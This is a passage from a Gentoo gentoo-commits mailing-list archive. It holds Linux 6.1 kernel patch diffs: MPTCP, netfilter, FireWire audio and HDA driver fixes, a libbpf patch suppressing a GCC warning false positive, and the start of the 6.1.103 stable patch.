+ 			alist.ids[alist.nr++] = entry->addr.id;
+ 	}
+ 
+ 	if (alist.nr) {
+ 		spin_lock_bh(&msk->pm.lock);
++		msk->pm.add_addr_signaled -= alist.nr;
+ 		mptcp_pm_remove_addr(msk, &alist);
+ 		spin_unlock_bh(&msk->pm.lock);
+ 	}
+diff --git a/net/mptcp/protocol.c b/net/mptcp/protocol.c
+index d6f3e1b9e8442..75ae91c931294 100644
+--- a/net/mptcp/protocol.c
++++ b/net/mptcp/protocol.c
+@@ -363,8 +363,10 @@ static bool __mptcp_move_skb(struct mptcp_sock *msk, struct sock *ssk,
+ 	skb_orphan(skb);
+ 
+ 	/* try to fetch required memory from subflow */
+-	if (!mptcp_rmem_schedule(sk, ssk, skb->truesize))
++	if (!mptcp_rmem_schedule(sk, ssk, skb->truesize)) {
++		MPTCP_INC_STATS(sock_net(sk), MPTCP_MIB_RCVPRUNED);
+ 		goto drop;
++	}
+ 
+ 	has_rxtstamp = TCP_SKB_CB(skb)->has_rxtstamp;
+ 
+@@ -851,10 +853,8 @@ void mptcp_data_ready(struct sock *sk, struct sock *ssk)
+ 		sk_rbuf = ssk_rbuf;
+ 
+ 	/* over limit? can't append more skbs to msk, Also, no need to wake-up*/
+-	if (__mptcp_rmem(sk) > sk_rbuf) {
+-		MPTCP_INC_STATS(sock_net(sk), MPTCP_MIB_RCVPRUNED);
++	if (__mptcp_rmem(sk) > sk_rbuf)
+ 		return;
+-	}
+ 
+ 	/* Wake-up the reader only for in-sequence data */
+ 	mptcp_data_lock(sk);
+@@ -1491,13 +1491,15 @@ static struct sock *mptcp_subflow_get_send(struct mptcp_sock *msk)
+ 	}
+ 
+ 	mptcp_for_each_subflow(msk, subflow) {
++		bool backup = subflow->backup || subflow->request_bkup;
++
+ 		trace_mptcp_subflow_get_send(subflow);
+ 		ssk =  mptcp_subflow_tcp_sock(subflow);
+ 		if (!mptcp_subflow_active(subflow))
+ 			continue;
+ 
+ 		tout = max(tout, mptcp_timeout_from_subflow(subflow));
+-		nr_active += !subflow->backup;
++		nr_active += !backup;
+ 		pace = subflow->avg_pacing_rate;
+ 		if (unlikely(!pace)) {
+ 			/* init pacing rate from socket */
+@@ -1508,9 +1510,9 @@ static struct sock *mptcp_subflow_get_send(struct mptcp_sock *msk)
+ 		}
+ 
+ 		linger_time = div_u64((u64)READ_ONCE(ssk->sk_wmem_queued) << 32, pace);
+-		if (linger_time < send_info[subflow->backup].linger_time) {
+-			send_info[subflow->backup].ssk = ssk;
+-			send_info[subflow->backup].linger_time = linger_time;
++		if (linger_time < send_info[backup].linger_time) {
++			send_info[backup].ssk = ssk;
++			send_info[backup].linger_time = linger_time;
+ 		}
+ 	}
+ 	__mptcp_set_timeout(sk, tout);
+diff --git a/net/mptcp/protocol.h b/net/mptcp/protocol.h
+index eaed858c0ff94..a2b85eebb620b 100644
+--- a/net/mptcp/protocol.h
++++ b/net/mptcp/protocol.h
+@@ -400,6 +400,7 @@ struct mptcp_subflow_request_sock {
+ 	u16	mp_capable : 1,
+ 		mp_join : 1,
+ 		backup : 1,
++		request_bkup : 1,
+ 		csum_reqd : 1,
+ 		allow_join_id0 : 1;
+ 	u8	local_id;
+diff --git a/net/mptcp/subflow.c b/net/mptcp/subflow.c
+index f1d422396b28b..96bdd4119578f 100644
+--- a/net/mptcp/subflow.c
++++ b/net/mptcp/subflow.c
+@@ -1103,14 +1103,22 @@ static void mptcp_subflow_discard_data(struct sock *ssk, struct sk_buff *skb,
+ {
+ 	struct mptcp_subflow_context *subflow = mptcp_subflow_ctx(ssk);
+ 	bool fin = TCP_SKB_CB(skb)->tcp_flags & TCPHDR_FIN;
+-	u32 incr;
++	struct tcp_sock *tp = tcp_sk(ssk);
++	u32 offset, incr, avail_len;
+ 
+-	incr = limit >= skb->len ? skb->len + fin : limit;
++	offset = tp->copied_seq - TCP_SKB_CB(skb)->seq;
++	if (WARN_ON_ONCE(offset > skb->len))
++		goto out;
++
++	avail_len = skb->len - offset;
++	incr = limit >= avail_len ? avail_len + fin : limit;
+ 
+-	pr_debug("discarding=%d len=%d seq=%d", incr, skb->len,
+-		 subflow->map_subflow_seq);
++	pr_debug("discarding=%d len=%d offset=%d seq=%d", incr, skb->len,
++		 offset, subflow->map_subflow_seq);
+ 	MPTCP_INC_STATS(sock_net(ssk), MPTCP_MIB_DUPDATA);
+ 	tcp_sk(ssk)->copied_seq += incr;
++
++out:
+ 	if (!before(tcp_sk(ssk)->copied_seq, TCP_SKB_CB(skb)->end_seq))
+ 		sk_eat_skb(ssk, skb);
+ 	if (mptcp_subflow_get_map_offset(subflow) >= subflow->map_data_len)
+@@ -1876,6 +1884,7 @@ static void subflow_ulp_clone(const struct request_sock *req,
+ 		new_ctx->mp_join = 1;
+ 		new_ctx->fully_established = 1;
+ 		new_ctx->backup = subflow_req->backup;
++		new_ctx->request_bkup = subflow_req->request_bkup;
+ 		WRITE_ONCE(new_ctx->remote_id, subflow_req->remote_id);
+ 		new_ctx->token = subflow_req->token;
+ 		new_ctx->thmac = subflow_req->thmac;
+diff --git a/net/netfilter/ipset/ip_set_list_set.c b/net/netfilter/ipset/ip_set_list_set.c
+index e839c356bcb56..902ff2f3bc72b 100644
+--- a/net/netfilter/ipset/ip_set_list_set.c
++++ b/net/netfilter/ipset/ip_set_list_set.c
+@@ -547,6 +547,9 @@ list_set_cancel_gc(struct ip_set *set)
+ 
+ 	if (SET_WITH_TIMEOUT(set))
+ 		del_timer_sync(&map->gc);
++
++	/* Flush list to drop references to other ipsets */
++	list_set_flush(set);
+ }
+ 
+ static const struct ip_set_type_variant set_variant = {
+diff --git a/net/sched/act_ct.c b/net/sched/act_ct.c
+index 44ff7f356ec15..9594dbc32165f 100644
+--- a/net/sched/act_ct.c
++++ b/net/sched/act_ct.c
+@@ -42,6 +42,8 @@ static DEFINE_MUTEX(zones_mutex);
+ struct zones_ht_key {
+ 	struct net *net;
+ 	u16 zone;
++	/* Note : pad[] must be the last field. */
++	u8  pad[];
+ };
+ 
+ struct tcf_ct_flow_table {
+@@ -58,7 +60,7 @@ struct tcf_ct_flow_table {
+ static const struct rhashtable_params zones_params = {
+ 	.head_offset = offsetof(struct tcf_ct_flow_table, node),
+ 	.key_offset = offsetof(struct tcf_ct_flow_table, key),
+-	.key_len = sizeof_field(struct tcf_ct_flow_table, key),
++	.key_len = offsetof(struct zones_ht_key, pad),
+ 	.automatic_shrinking = true,
+ };
+ 
+diff --git a/net/sysctl_net.c b/net/sysctl_net.c
+index 4b45ed631eb8b..2edb8040eb6c7 100644
+--- a/net/sysctl_net.c
++++ b/net/sysctl_net.c
+@@ -54,7 +54,6 @@ static int net_ctl_permissions(struct ctl_table_header *head,
+ }
+ 
+ static void net_ctl_set_ownership(struct ctl_table_header *head,
+-				  struct ctl_table *table,
+ 				  kuid_t *uid, kgid_t *gid)
+ {
+ 	struct net *net = container_of(head->set, struct net, sysctls);
+diff --git a/sound/firewire/amdtp-stream.c b/sound/firewire/amdtp-stream.c
+index 8753125683692..842fe127c5378 100644
+--- a/sound/firewire/amdtp-stream.c
++++ b/sound/firewire/amdtp-stream.c
+@@ -77,6 +77,8 @@
+ // overrun. Actual device can skip more, then this module stops the packet streaming.
+ #define IR_JUMBO_PAYLOAD_MAX_SKIP_CYCLES	5
+ 
++static void pcm_period_work(struct work_struct *work);
++
+ /**
+  * amdtp_stream_init - initialize an AMDTP stream structure
+  * @s: the AMDTP stream to initialize
+@@ -105,6 +107,7 @@ int amdtp_stream_init(struct amdtp_stream *s, struct fw_unit *unit,
+ 	s->flags = flags;
+ 	s->context = ERR_PTR(-1);
+ 	mutex_init(&s->mutex);
++	INIT_WORK(&s->period_work, pcm_period_work);
+ 	s->packet_index = 0;
+ 
+ 	init_waitqueue_head(&s->ready_wait);
+@@ -343,6 +346,7 @@ EXPORT_SYMBOL(amdtp_stream_get_max_payload);
+  */
+ void amdtp_stream_pcm_prepare(struct amdtp_stream *s)
+ {
++	cancel_work_sync(&s->period_work);
+ 	s->pcm_buffer_pointer = 0;
+ 	s->pcm_period_pointer = 0;
+ }
+@@ -609,19 +613,21 @@ static void update_pcm_pointers(struct amdtp_stream *s,
+ 		// The program in user process should periodically check the status of intermediate
+ 		// buffer associated to PCM substream to process PCM frames in the buffer, instead
+ 		// of receiving notification of period elapsed by poll wait.
+-		if (!pcm->runtime->no_period_wakeup) {
+-			if (in_softirq()) {
+-				// In software IRQ context for 1394 OHCI.
+-				snd_pcm_period_elapsed(pcm);
+-			} else {
+-				// In process context of ALSA PCM application under acquired lock of
+-				// PCM substream.
+-				snd_pcm_period_elapsed_under_stream_lock(pcm);
+-			}
+-		}
++		if (!pcm->runtime->no_period_wakeup)
++			queue_work(system_highpri_wq, &s->period_work);
+ 	}
+ }
+ 
++static void pcm_period_work(struct work_struct *work)
++{
++	struct amdtp_stream *s = container_of(work, struct amdtp_stream,
++					      period_work);
++	struct snd_pcm_substream *pcm = READ_ONCE(s->pcm);
++
++	if (pcm)
++		snd_pcm_period_elapsed(pcm);
++}
++
+ static int queue_packet(struct amdtp_stream *s, struct fw_iso_packet *params,
+ 			bool sched_irq)
+ {
+@@ -1738,11 +1744,14 @@ unsigned long amdtp_domain_stream_pcm_pointer(struct amdtp_domain *d,
+ {
+ 	struct amdtp_stream *irq_target = d->irq_target;
+ 
+-	// Process isochronous packets queued till recent isochronous cycle to handle PCM frames.
+ 	if (irq_target && amdtp_stream_running(irq_target)) {
+-		// In software IRQ context, the call causes dead-lock to disable the tasklet
+-		// synchronously.
+-		if (!in_softirq())
++		// use wq to prevent AB/BA deadlock competition for
++		// substream lock:
++		// fw_iso_context_flush_completions() acquires
++		// lock by ohci_flush_iso_completions(),
++		// amdtp-stream process_rx_packets() attempts to
++		// acquire same lock by snd_pcm_elapsed()
++		if (current_work() != &s->period_work)
+ 			fw_iso_context_flush_completions(irq_target->context);
+ 	}
+ 
+@@ -1798,6 +1807,7 @@ static void amdtp_stream_stop(struct amdtp_stream *s)
+ 		return;
+ 	}
+ 
++	cancel_work_sync(&s->period_work);
+ 	fw_iso_context_stop(s->context);
+ 	fw_iso_context_destroy(s->context);
+ 	s->context = ERR_PTR(-1);
+diff --git a/sound/firewire/amdtp-stream.h b/sound/firewire/amdtp-stream.h
+index cf9ab347277f2..011d0f0c39415 100644
+--- a/sound/firewire/amdtp-stream.h
++++ b/sound/firewire/amdtp-stream.h
+@@ -190,6 +190,7 @@ struct amdtp_stream {
+ 
+ 	/* For a PCM substream processing. */
+ 	struct snd_pcm_substream *pcm;
++	struct work_struct period_work;
+ 	snd_pcm_uframes_t pcm_buffer_pointer;
+ 	unsigned int pcm_period_pointer;
+ 
+diff --git a/sound/pci/hda/hda_controller.h b/sound/pci/hda/hda_controller.h
+index 8556031bcd68e..f31cb31d46362 100644
+--- a/sound/pci/hda/hda_controller.h
++++ b/sound/pci/hda/hda_controller.h
+@@ -28,7 +28,7 @@
+ #else
+ #define AZX_DCAPS_I915_COMPONENT 0		/* NOP */
+ #endif
+-/* 14 unused */
++#define AZX_DCAPS_AMD_ALLOC_FIX	(1 << 14)	/* AMD allocation workaround */
+ #define AZX_DCAPS_CTX_WORKAROUND (1 << 15)	/* X-Fi workaround */
+ #define AZX_DCAPS_POSFIX_LPIB	(1 << 16)	/* Use LPIB as default */
+ #define AZX_DCAPS_AMD_WORKAROUND (1 << 17)	/* AMD-specific workaround */
+diff --git a/sound/pci/hda/hda_intel.c b/sound/pci/hda/hda_intel.c
+index a26f2a2d44cf2..695026c647e1e 100644
+--- a/sound/pci/hda/hda_intel.c
++++ b/sound/pci/hda/hda_intel.c
+@@ -40,6 +40,7 @@
+ 
+ #ifdef CONFIG_X86
+ /* for snoop control */
++#include <linux/dma-map-ops.h>
+ #include <asm/set_memory.h>
+ #include <asm/cpufeature.h>
+ #endif
+@@ -300,7 +301,7 @@ enum {
+ 
+ /* quirks for ATI HDMI with snoop off */
+ #define AZX_DCAPS_PRESET_ATI_HDMI_NS \
+-	(AZX_DCAPS_PRESET_ATI_HDMI | AZX_DCAPS_SNOOP_OFF)
++	(AZX_DCAPS_PRESET_ATI_HDMI | AZX_DCAPS_AMD_ALLOC_FIX)
+ 
+ /* quirks for AMD SB */
+ #define AZX_DCAPS_PRESET_AMD_SB \
+@@ -1718,6 +1719,13 @@ static void azx_check_snoop_available(struct azx *chip)
+ 	if (chip->driver_caps & AZX_DCAPS_SNOOP_OFF)
+ 		snoop = false;
+ 
++#ifdef CONFIG_X86
++	/* check the presence of DMA ops (i.e. IOMMU), disable snoop conditionally */
++	if ((chip->driver_caps & AZX_DCAPS_AMD_ALLOC_FIX) &&
++	    !get_dma_ops(chip->card->dev))
++		snoop = false;
++#endif
++
+ 	chip->snoop = snoop;
+ 	if (!snoop) {
+ 		dev_info(chip->card->dev, "Force to non-snoop mode\n");
+diff --git a/sound/pci/hda/patch_conexant.c b/sound/pci/hda/patch_conexant.c
+index e8209178d87bb..af921364195e4 100644
+--- a/sound/pci/hda/patch_conexant.c
++++ b/sound/pci/hda/patch_conexant.c
+@@ -21,12 +21,6 @@
+ #include "hda_jack.h"
+ #include "hda_generic.h"
+ 
+-enum {
+-	CX_HEADSET_NOPRESENT = 0,
+-	CX_HEADSET_PARTPRESENT,
+-	CX_HEADSET_ALLPRESENT,
+-};
+-
+ struct conexant_spec {
+ 	struct hda_gen_spec gen;
+ 
+@@ -48,7 +42,6 @@ struct conexant_spec {
+ 	unsigned int gpio_led;
+ 	unsigned int gpio_mute_led_mask;
+ 	unsigned int gpio_mic_led_mask;
+-	unsigned int headset_present_flag;
+ 	bool is_cx8070_sn6140;
+ };
+ 
+@@ -250,48 +243,19 @@ static void cx_process_headset_plugin(struct hda_codec *codec)
+ 	}
+ }
+ 
+-static void cx_update_headset_mic_vref(struct hda_codec *codec, unsigned int res)
++static void cx_update_headset_mic_vref(struct hda_codec *codec, struct hda_jack_callback *event)
+ {
+-	unsigned int phone_present, mic_persent, phone_tag, mic_tag;
+-	struct conexant_spec *spec = codec->spec;
++	unsigned int mic_present;
+ 
+ 	/* In cx8070 and sn6140, the node 16 can only be config to headphone or disabled,
+ 	 * the node 19 can only be config to microphone or disabled.
+ 	 * Check hp&mic tag to process headset pulgin&plugout.
+ 	 */
+-	phone_tag = snd_hda_codec_read(codec, 0x16, 0, AC_VERB_GET_UNSOLICITED_RESPONSE, 0x0);
+-	mic_tag = snd_hda_codec_read(codec, 0x19, 0, AC_VERB_GET_UNSOLICITED_RESPONSE, 0x0);
+-	if ((phone_tag & (res >> AC_UNSOL_RES_TAG_SHIFT)) ||
+-	    (mic_tag & (res >> AC_UNSOL_RES_TAG_SHIFT))) {
+-		phone_present = snd_hda_codec_read(codec, 0x16, 0, AC_VERB_GET_PIN_SENSE, 0x0);
+-		if (!(phone_present & AC_PINSENSE_PRESENCE)) {/* headphone plugout */
+-			spec->headset_present_flag = CX_HEADSET_NOPRESENT;
+-			snd_hda_codec_write(codec, 0x19, 0, AC_VERB_SET_PIN_WIDGET_CONTROL, 0x20);
+-			return;
+-		}
+-		if (spec->headset_present_flag == CX_HEADSET_NOPRESENT) {
+-			spec->headset_present_flag = CX_HEADSET_PARTPRESENT;
+-		} else if (spec->headset_present_flag == CX_HEADSET_PARTPRESENT) {
+-			mic_persent = snd_hda_codec_read(codec, 0x19, 0,
+-							 AC_VERB_GET_PIN_SENSE, 0x0);
+-			/* headset is present */
+-			if ((phone_present & AC_PINSENSE_PRESENCE) &&
+-			    (mic_persent & AC_PINSENSE_PRESENCE)) {
+-				cx_process_headset_plugin(codec);
+-				spec->headset_present_flag = CX_HEADSET_ALLPRESENT;
+-			}
+-		}
+-	}
+-}
+-
+-static void cx_jack_unsol_event(struct hda_codec *codec, unsigned int res)
+-{
+-	struct conexant_spec *spec = codec->spec;
+-
+-	if (spec->is_cx8070_sn6140)
+-		cx_update_headset_mic_vref(codec, res);
+-
+-	snd_hda_jack_unsol_event(codec, res);
++	mic_present = snd_hda_codec_read(codec, 0x19, 0, AC_VERB_GET_PIN_SENSE, 0x0);
++	if (!(mic_present & AC_PINSENSE_PRESENCE)) /* mic plugout */
++		snd_hda_codec_write(codec, 0x19, 0, AC_VERB_SET_PIN_WIDGET_CONTROL, 0x20);
++	else
++		cx_process_headset_plugin(codec);
+ }
+ 
+ #ifdef CONFIG_PM
+@@ -307,7 +271,7 @@ static const struct hda_codec_ops cx_auto_patch_ops = {
+ 	.build_pcms = snd_hda_gen_build_pcms,
+ 	.init = cx_auto_init,
+ 	.free = cx_auto_free,
+-	.unsol_event = cx_jack_unsol_event,
++	.unsol_event = snd_hda_jack_unsol_event,
+ #ifdef CONFIG_PM
+ 	.suspend = cx_auto_suspend,
+ 	.check_power_status = snd_hda_gen_check_power_status,
+@@ -1167,7 +1131,7 @@ static int patch_conexant_auto(struct hda_codec *codec)
+ 	case 0x14f11f86:
+ 	case 0x14f11f87:
+ 		spec->is_cx8070_sn6140 = true;
+-		spec->headset_present_flag = CX_HEADSET_NOPRESENT;
++		snd_hda_jack_detect_enable_callback(codec, 0x19, cx_update_headset_mic_vref);
+ 		break;
+ 	}
+ 
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index e0df44bfda4e6..edfcd38175d23 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9496,6 +9496,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1025, 0x079b, "Acer Aspire V5-573G", ALC282_FIXUP_ASPIRE_V5_PINS),
+ 	SND_PCI_QUIRK(0x1025, 0x080d, "Acer Aspire V5-122P", ALC269_FIXUP_ASPIRE_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x1025, 0x0840, "Acer Aspire E1", ALC269VB_FIXUP_ASPIRE_E1_COEF),
++	SND_PCI_QUIRK(0x1025, 0x100c, "Acer Aspire E5-574G", ALC255_FIXUP_ACER_LIMIT_INT_MIC_BOOST),
+ 	SND_PCI_QUIRK(0x1025, 0x101c, "Acer Veriton N2510G", ALC269_FIXUP_LIFEBOOK),
+ 	SND_PCI_QUIRK(0x1025, 0x102b, "Acer Aspire C24-860", ALC286_FIXUP_ACER_AIO_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1025, 0x1065, "Acer Aspire C20-820", ALC269VC_FIXUP_ACER_HEADSET_MIC),
+diff --git a/sound/usb/stream.c b/sound/usb/stream.c
+index d5409f3879455..e14c725acebf2 100644
+--- a/sound/usb/stream.c
++++ b/sound/usb/stream.c
+@@ -244,8 +244,8 @@ static struct snd_pcm_chmap_elem *convert_chmap(int channels, unsigned int bits,
+ 		SNDRV_CHMAP_FR,		/* right front */
+ 		SNDRV_CHMAP_FC,		/* center front */
+ 		SNDRV_CHMAP_LFE,	/* LFE */
+-		SNDRV_CHMAP_SL,		/* left surround */
+-		SNDRV_CHMAP_SR,		/* right surround */
++		SNDRV_CHMAP_RL,		/* left surround */
++		SNDRV_CHMAP_RR,		/* right surround */
+ 		SNDRV_CHMAP_FLC,	/* left of center */
+ 		SNDRV_CHMAP_FRC,	/* right of center */
+ 		SNDRV_CHMAP_RC,		/* surround */
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_connect.c b/tools/testing/selftests/net/mptcp/mptcp_connect.c
+index e6b514cb7bdda..b6b9f41dbc295 100644
+--- a/tools/testing/selftests/net/mptcp/mptcp_connect.c
++++ b/tools/testing/selftests/net/mptcp/mptcp_connect.c
+@@ -1040,11 +1040,11 @@ int main_loop_s(int listensock)
+ 		return 1;
+ 	}
+ 
+-	if (--cfg_repeat > 0) {
+-		if (cfg_input)
+-			close(fd);
++	if (cfg_input)
++		close(fd);
++
++	if (--cfg_repeat > 0)
+ 		goto again;
+-	}
+ 
+ 	return 0;
+ }


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-08-10 15:45 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-08-10 15:45 UTC (permalink / raw
  To: gentoo-commits

commit:     a54b3d0973c90157cfcd0a9a1ca11d2907b6118c
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sat Aug 10 15:45:07 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sat Aug 10 15:45:07 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=a54b3d09

libbpf: workaround -Wmaybe-uninitialized false positive

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                        |  4 ++
 ...workaround-Wmaybe-uninitialized-false-pos.patch | 67 ++++++++++++++++++++++
 2 files changed, 71 insertions(+)

diff --git a/0000_README b/0000_README
index dae675f2..97b15896 100644
--- a/0000_README
+++ b/0000_README
@@ -495,6 +495,10 @@ Patch:  2960_jump-label-fix.patch
 From:   https://git.kernel.org/pub/scm/linux/kernel/git/tip/tip.git/
 Desc:   jump_label: Fix a regression
 
+Patch:  2990_libbpf-workaround-Wmaybe-uninitialized-false-pos.patch
+From:   https://lore.kernel.org/bpf/3ebbe7a4e93a5ddc3a26e2e11d329801d7c8de6b.1723217044.git.sam@gentoo.org/
+Desc:   libbpf: workaround -Wmaybe-uninitialized false positive
+
 Patch:  3000_Support-printing-firmware-info.patch
 From:   https://bugs.gentoo.org/732852
 Desc:   Print firmware info (Reqs CONFIG_GENTOO_PRINT_FIRMWARE_INFO). Thanks to Georgy Yakovlev

diff --git a/2990_libbpf-workaround-Wmaybe-uninitialized-false-pos.patch b/2990_libbpf-workaround-Wmaybe-uninitialized-false-pos.patch
new file mode 100644
index 00000000..86de18d7
--- /dev/null
+++ b/2990_libbpf-workaround-Wmaybe-uninitialized-false-pos.patch
@@ -0,0 +1,67 @@
+From git@z Thu Jan  1 00:00:00 1970
+Subject: [PATCH] libbpf: workaround -Wmaybe-uninitialized false positive
+From: Sam James <sam@gentoo.org>
+Date: Fri, 09 Aug 2024 16:24:04 +0100
+Message-Id: <3ebbe7a4e93a5ddc3a26e2e11d329801d7c8de6b.1723217044.git.sam@gentoo.org>
+MIME-Version: 1.0
+Content-Type: text/plain; charset="utf-8"
+Content-Transfer-Encoding: 8bit
+
+In `elf_close`, we get this with GCC 15 -O3 (at least):
+```
+In function ‘elf_close’,
+    inlined from ‘elf_close’ at elf.c:53:6,
+    inlined from ‘elf_find_func_offset_from_file’ at elf.c:384:2:
+elf.c:57:9: warning: ‘elf_fd.elf’ may be used uninitialized [-Wmaybe-uninitialized]
+   57 |         elf_end(elf_fd->elf);
+      |         ^~~~~~~~~~~~~~~~~~~~
+elf.c: In function ‘elf_find_func_offset_from_file’:
+elf.c:377:23: note: ‘elf_fd.elf’ was declared here
+  377 |         struct elf_fd elf_fd;
+      |                       ^~~~~~
+In function ‘elf_close’,
+    inlined from ‘elf_close’ at elf.c:53:6,
+    inlined from ‘elf_find_func_offset_from_file’ at elf.c:384:2:
+elf.c:58:9: warning: ‘elf_fd.fd’ may be used uninitialized [-Wmaybe-uninitialized]
+   58 |         close(elf_fd->fd);
+      |         ^~~~~~~~~~~~~~~~~
+elf.c: In function ‘elf_find_func_offset_from_file’:
+elf.c:377:23: note: ‘elf_fd.fd’ was declared here
+  377 |         struct elf_fd elf_fd;
+      |                       ^~~~~~
+```
+
+In reality, our use is fine, it's just that GCC doesn't model errno
+here (see linked GCC bug). Suppress -Wmaybe-uninitialized accordingly.
+
+Link: https://gcc.gnu.org/PR114952
+Signed-off-by: Sam James <sam@gentoo.org>
+---
+ tools/lib/bpf/elf.c | 4 ++++
+ 1 file changed, 4 insertions(+)
+
+diff --git a/tools/lib/bpf/elf.c b/tools/lib/bpf/elf.c
+index c92e02394159e..ee226bb8e1af0 100644
+--- a/tools/lib/bpf/elf.c
++++ b/tools/lib/bpf/elf.c
+@@ -369,6 +369,9 @@ long elf_find_func_offset(Elf *elf, const char *binary_path, const char *name)
+ 	return ret;
+ }
+ 
++#pragma GCC diagnostic push
++/* https://gcc.gnu.org/PR114952 */
++#pragma GCC diagnostic ignored "-Wmaybe-uninitialized"
+ /* Find offset of function name in ELF object specified by path. "name" matches
+  * symbol name or name@@LIB for library functions.
+  */
+@@ -384,6 +387,7 @@ long elf_find_func_offset_from_file(const char *binary_path, const char *name)
+ 	elf_close(&elf_fd);
+ 	return ret;
+ }
++#pragma GCC diagnostic pop
+ 
+ struct symbol {
+ 	const char *name;
+-- 
+2.45.2
+


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-08-03 15:28 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-08-03 15:28 UTC (permalink / raw
  To: gentoo-commits

commit:     e0009dd3c55f5137532a180281cf4c0ee2d11bf6
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sat Aug  3 15:27:37 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sat Aug  3 15:27:37 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=e0009dd3

Linux patch 6.1.103 and an addtional patch

Add jump label fix patch thanks to Holger Hoffstätte

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README               |     8 +
 1102_linux-6.1.103.patch  | 16486 ++++++++++++++++++++++++++++++++++++++++++++
 2960_jump-label-fix.patch |    57 +
 3 files changed, 16551 insertions(+)

diff --git a/0000_README b/0000_README
index 2afa5cc7..dae675f2 100644
--- a/0000_README
+++ b/0000_README
@@ -451,6 +451,10 @@ Patch:  1101_linux-6.1.102.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.102
 
+Patch:  1102_linux-6.1.103.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.103
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.
@@ -487,6 +491,10 @@ Patch:  2950_kbuild-CRC32-1MB-dict-xz-modules.patch
 From:   https://git.kernel.org/pub/scm/linux/kernel/git/masahiroy/linux-kbuild.git/commit/?h=kbuild&id=fbf5892df21a8ccfcb2fda0fd65bc3169c89ed28
 Desc:   kbuild: Use CRC32 and a 1MiB dictionary for XZ compressed modules
 
+Patch:  2960_jump-label-fix.patch
+From:   https://git.kernel.org/pub/scm/linux/kernel/git/tip/tip.git/
+Desc:   jump_label: Fix a regression
+
 Patch:  3000_Support-printing-firmware-info.patch
 From:   https://bugs.gentoo.org/732852
 Desc:   Print firmware info (Reqs CONFIG_GENTOO_PRINT_FIRMWARE_INFO). Thanks to Georgy Yakovlev

diff --git a/1102_linux-6.1.103.patch b/1102_linux-6.1.103.patch
new file mode 100644
index 00000000..22474658
--- /dev/null
+++ b/1102_linux-6.1.103.patch
@@ -0,0 +1,16486 @@
+diff --git a/Documentation/devicetree/bindings/thermal/thermal-zones.yaml b/Documentation/devicetree/bindings/thermal/thermal-zones.yaml
+index 8d2c6d74b605a..bc9ccdfd3a275 100644
+--- a/Documentation/devicetree/bindings/thermal/thermal-zones.yaml
++++ b/Documentation/devicetree/bindings/thermal/thermal-zones.yaml
+@@ -49,7 +49,10 @@ properties:
+       to take when the temperature crosses those thresholds.
+ 
+ patternProperties:
+-  "^[a-zA-Z][a-zA-Z0-9\\-]{1,12}-thermal$":
++  # Node name is limited in size due to Linux kernel requirements - 19
++  # characters in total (see THERMAL_NAME_LENGTH, including terminating NUL
++  # byte):
++  "^[a-zA-Z][a-zA-Z0-9\\-]{1,10}-thermal$":
+     type: object
+     description:
+       Each thermal zone node contains information about how frequently it
+diff --git a/Makefile b/Makefile
+index 00ec5357bc78d..97149e46565ae 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 102
++SUBLEVEL = 103
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/boot/dts/imx6q-kontron-samx6i.dtsi b/arch/arm/boot/dts/imx6q-kontron-samx6i.dtsi
+index 4d6a0c3e8455f..ff062f4fd726e 100644
+--- a/arch/arm/boot/dts/imx6q-kontron-samx6i.dtsi
++++ b/arch/arm/boot/dts/imx6q-kontron-samx6i.dtsi
+@@ -5,31 +5,8 @@
+ 
+ #include "imx6q.dtsi"
+ #include "imx6qdl-kontron-samx6i.dtsi"
+-#include <dt-bindings/gpio/gpio.h>
+ 
+ / {
+ 	model = "Kontron SMARC sAMX6i Quad/Dual";
+ 	compatible = "kontron,imx6q-samx6i", "fsl,imx6q";
+ };
+-
+-/* Quad/Dual SoMs have 3 chip-select signals */
+-&ecspi4 {
+-	cs-gpios = <&gpio3 24 GPIO_ACTIVE_LOW>,
+-		   <&gpio3 29 GPIO_ACTIVE_LOW>,
+-		   <&gpio3 25 GPIO_ACTIVE_LOW>;
+-};
+-
+-&pinctrl_ecspi4 {
+-	fsl,pins = <
+-		MX6QDL_PAD_EIM_D21__ECSPI4_SCLK 0x100b1
+-		MX6QDL_PAD_EIM_D28__ECSPI4_MOSI 0x100b1
+-		MX6QDL_PAD_EIM_D22__ECSPI4_MISO 0x100b1
+-
+-		/* SPI4_IMX_CS2# - connected to internal flash */
+-		MX6QDL_PAD_EIM_D24__GPIO3_IO24 0x1b0b0
+-		/* SPI4_IMX_CS0# - connected to SMARC SPI0_CS0# */
+-		MX6QDL_PAD_EIM_D29__GPIO3_IO29 0x1b0b0
+-		/* SPI4_CS3# - connected to  SMARC SPI0_CS1# */
